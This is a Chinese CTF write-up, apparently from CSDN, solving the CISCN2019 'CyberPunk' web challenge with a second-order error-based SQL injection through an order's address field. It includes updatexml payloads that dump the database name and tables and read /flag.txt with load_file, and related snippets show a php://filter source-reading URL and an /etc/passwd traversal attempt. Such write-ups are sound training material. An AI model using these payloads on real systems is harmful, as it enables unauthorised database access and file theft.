[CISCN2019 华北赛区 Day1 Web5]CyberPunk --不会编程的崽

最新推荐文章于 2024-05-30 14:59:09 发布
最新推荐文章于 2024-05-30 14:59:09 发布
阅读量358 收藏 2
点赞数 11
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/daimakunnanhu/article/details/136836560
版权

继续sql,哈哈。我按照我的思路来讲。

四个功能,提交,查找,修改,删除。多半是sql注入,而且又有修改,查找功能。多半还是二次注入。昨天那个修改密码的,也是二次注入。这里需要先找到注入点 姓名 电话 地址三选一。我最先怀疑的是地址,因为无论哪个功能,都需要输入姓名,电话。相反地址才是会因为查询而二次带入sql语句的。再去fuzz一下。似乎,对地址这没什么过滤。要注意,每次订单的名字或者电话不能一样。先构造payload吧

地址:admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))#

然后查询订单,发现原封不动的回显。修改订单试试呢。

 

果然报错了。继续构造就行 。继续爆表

地址:admin'or(updatexml(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like('ctfusers')),0x7e),1))#

然后安装正常思路,应该去爆表。但是,,,我爆了很久,都没发现flag的表。然后又去看了大佬的wp。原来要读取flag.txt文件。

地址:admin'or(updatexml(1,concat(0x7e,right((select(load_file('/flag.txt'))),20),0x7e),1))#

因为这还是存在长度限制。然后我又使用了right函数。读取左边把right函数去掉就行

地址:admin'or(updatexml(1,concat(0x7e,(select(load_file('/flag.txt'))),0x7e),1))#

 

flag就拿到了。然后我又去看来大佬的IP,原来这里还存在文件读取漏洞,可以读取到源码。。。 

看来细节方面还有待提升 

不会编程的崽
关注
  • 11
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Cyberpunk-GRUB-Theme:[MIRROR]赛博朋克2077启发了GRUBGRUB2主题
05-27
GRUB Bootloader的Cyber​​punk主题 受赛博朋克2077电子游戏启发的GRUB Bootloader主题。 安装 从下载 提取并运行 sudo ./install.sh 注意:经过测试,最好在1920x1080分辨率下观看
cyberpunk-iterm:Term iTerm的骇客色彩计划
05-10
赛博朋克iTerm :alien_monster: iTerm骇客Colorscheme 工具在预览中使用: exa , neofetch , httpie和jq 。 ‍安装 转到“个人资料”标签 点击“颜色” 导入cyberpunk.itermcolors 从颜色预设中选择。 :alien_monster: :raising_hands: 学分 向为VS Code创建原始的。 :balance_scale: 执照 :copyright: 。
[CISCN2019 华北赛区 Day1 Web5]CyberPunk,网络安全核心知识点
m0_61549781的博客
04-06 803
在index.php页面的响应最下面可以发现提示了?file=?,猜测应该是个读取文件的点尝试伪协议读源码?把所有源码读到本地以后就是代码审计了,可以发现每个页面都对username和phone做了过滤但是并没有对address做过滤,只有在change.php页面对新提交的address做了特殊字符转义,但是还拼接了前一句的查询结果里的address值,这个值可是没有被黑名单过滤,而且还有 一个关键是做了if判断,如果上面的第一个查询结果正确,第二个结果报错就会将报错信息输出。
cyberpunk-web-page-webm
10-29
cyberpunk-web-page-webm
Cybe
10-25
Cybe
cyberpunk-vue:for适用于Vue.js的深色样式组件库
04-28
English | 赛博朋克Vue 该项目正在开发中,API可能会进行升级和更改,请暂时不要将其应用于生产项目 文件资料 特征 完整的深色UI控件颜色匹配,可帮助您快速构建页面 享受Vue Webpack开发经验并在手机和PC上使用 使用Chai mocha作为单元测试工具,测试覆盖率达到90% 安装 npm install cyberpunk-vue yarn add cyberpunk-vue 快速开始 import Vue from 'vue' ; import cyberpunk from 'cyberpunk-vue' ; import 'cyberpunk-vue/lib/cyberpunk-vue.css' ; Vue . use ( cyberpunk ) ; // or import { Button , Input // ... } from 'cyber
[CISCN2019 华北赛区 Day1 Web5]CyberPunk
m0_62905261的博客
07-18 309
[CISCN2019 华北赛区 Day1 Web5]CyberPunk
BUUCTF:[CISCN2019 华北赛区 Day1 Web5]CyberPunk
末初的CSDN博客
03-26 2228
F12查看源码,发现存在传参 尝试通过伪协议文件包含读取源码: http://467ceaa4-2e02-46f9-b14a-25ec91a65986.node3.buuoj.cn/?file=php://filter/convert.base64-encode/resource=index.php 发现除了index.php还存在这几个php文件:confirm.php,delete.ph...
BUUCTF-[CISCN2019 华北赛区 Day1 Web5]CyberPunk
AndyNoel的博客
05-13 428
BUUCTF-[CISCN2019 华北赛区 Day1 Web5]CyberPunk 看题 看源码有提示?file=? 文件包含漏洞,可以利用这个漏洞读取源码。 分析 index.php?file=php://filter/read=convert.base64-encode/resource=change.php 挨个读取完后,base64解码后,在change.php发现了一点问题 <?php require_once "config.php"; if(!empty($_POST["us
[CISCN2019 华北赛区 Day1 Web5]CyberPunk 二次报错注入
m0_64180167的博客
10-08 7194
buu上 做点首先就是打开环境 开始信息收集发现源代码中存在?file提示我们多半是包含我原本去试了试 ../../etc/passwd失败了 直接伪协议上吧我们通过伪协议全部读取我们提取关键信息。
cyberpunk-2019:emacs需要的Cyber​​punk主题,但也许不值得。
02-05
cyberpunk-2019:emacs需要的Cyber​​punk主题,但也许不值得。
NO.3-12 [CISCN2019 华北赛区 Day1 Web5]CyberPunk
nigo134的博客
08-07 180
解题过程 首先进入题目页面 看起来没有什么特别的,就是一个可以提交信息的页面。查看响应报文也没有什么提示,但是在网页注释里有东西。 <!--?file=?--> 这里可能有一个文件包含,尝试payload http://xxx.xxx/index.php?file=php://filter/convert.base64-encode/resource=index.php 结果得到了当前页面经过加密后的源码 有关伪协议的内容,可以大致参考下这篇文章:https://
【uniapp公众号分销商城从0到1】手机验证注册登录(04)
热门推荐
Neil_1993的博客
12-12 8万+
资源一览: let _self; import { mapState, mapMutations, mapActions } from 'vuex' import tuiIcon from "@/components/icon/icon" import tuiButton from "@/components/button/button" const util = re...
全国信安竞赛半决赛(华北赛区)部分题目题解
qq_43647462的博客
06-09 562
由于能力有限,本次题解仅包括第二个比赛日的WEB1和WEB2以及WEB2的修补思路 WEB1 首先我们直接可以发现我们的目的是在ctf表中查询flag这个字符串,也可以通过id=1和id=0发现可能是一个布尔注入,但是经过测试我们可以发现两个问题: 第一个,你的sql语句,大多数关键词union by and 都被加到了黑名单里面,如何构造sql语句是一个大问题。 第二个,你如...
如何mysql数据导入到mongdb
codemami的博客
05-30 768
由于MySQL和MongoDB的数据模型不同(例如,MySQL使用关系模型,而MongoDB使用文档模型),你可能需要转换数据的格式。使用MongoDB驱动程序:你也可以使用MongoDB的官方驱动程序(如Python的pymongo)来编写脚本,将数据直接插入到MongoDB中。注意:如果你的JSON文件包含多个文档,并且它们不是作为数组的一部分(即每个文档都在其自己的行上),则需要使用--jsonArray选项。手动转换:对于小型数据集,你可以手动编辑SQL或CSV文件,将其转换为JSON格式。
书籍学习|基于SprinBoot+vue的书籍学习平台(源码+数据库+文档)
JIngJaneIL的博客
05-28 1085
首先,论文一开始便是清楚的论述了平台的研究内容。其次,剖析平台需求分析,弄明白“做什么”,分析包括业务分析和业务流程的分析以及用例分析,更进一步明确平台的需求。然后在明白了平台的需求基础上需要进一步地设计平台,主要包罗软件架构模式、整体功能模块、数据库设计。本项目软件架构选择B/S模式和java技术,总体功能模块运用自顶向下的分层思想。再然后就是实现平台并进行代码编写实现功能。论文的最后章节总结一下自己完成本论文和开发本项目的心得和总结。通过书籍学习平台将会使书籍学习各个方面的工作效率带来实质性的提升。
oracle中的INTERVAL函数学习总结
weixin_42821740的博客
05-30 354
简单学懂interval函数
行列视(RCV)能否在指定时间生成报表数据?
最新发布
2401_83701843的博客
05-30 121
需要注意的是,要实现指定时间生成报表数据的功能,用户需要确保行列视(RCV)系统已经正确配置并连接了相应的数据源,同时还需要根据实际需求进行报表格式和计算逻辑的设置。此外,系统的稳定性和性能也是影响报表生成的重要因素,用户需要确保系统能够正常运行并处理大量的数据。其次,关于指定时间生成报表数据的需求,用户可以通过行列视(RCV)的定时任务功能来实现。综上所述,行列视(RCV)具备在指定时间生成报表数据的能力,但具体实现方式需要根据系统的配置和使用需求来确定。
赛博朋克2077博客
12-06
很高兴回答您的问题。以下是关于赛博朋克2077的博客: 赛博朋克2077是一款备受期待的游戏,它的故事背景设定在一个充满麻烦的未来,视觉效果令人惊叹,庞大的地图让我们好奇CD PROJEKT RED是如何在重塑赛博朋克风格的同时描绘出一个反乌托邦的未来的。如果您想了解更多关于这款游戏的信息,可以查看以下博客: 1. 官方博客:https://www.cyberpunk.net/us/en/ 这是赛博朋克2077的官方博客,您可以在这里找到最新的游戏资讯、开发者日志、游戏截图和视频等。 2. Substance3D博客:https://magazine.substance3d.com/cyberpunk-2077-a-world-full-of-substance/ 这是Substance3D的博客,他们是赛博朋克2077的合作伙伴之一,为游戏提供了许多材质和纹理。在这篇博客中,他们分享了他们如何为游戏创造出一个充满细节和真实感的世界。 3. IGN博客:https://www.ign.com/articles/cyberpunk-2077 这是IGN的博客,他们是一家知名的游戏媒体,他们为赛博朋克2077提供了许多报道和评论。在这篇博客中,他们分享了他们对游戏的看法和评价。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值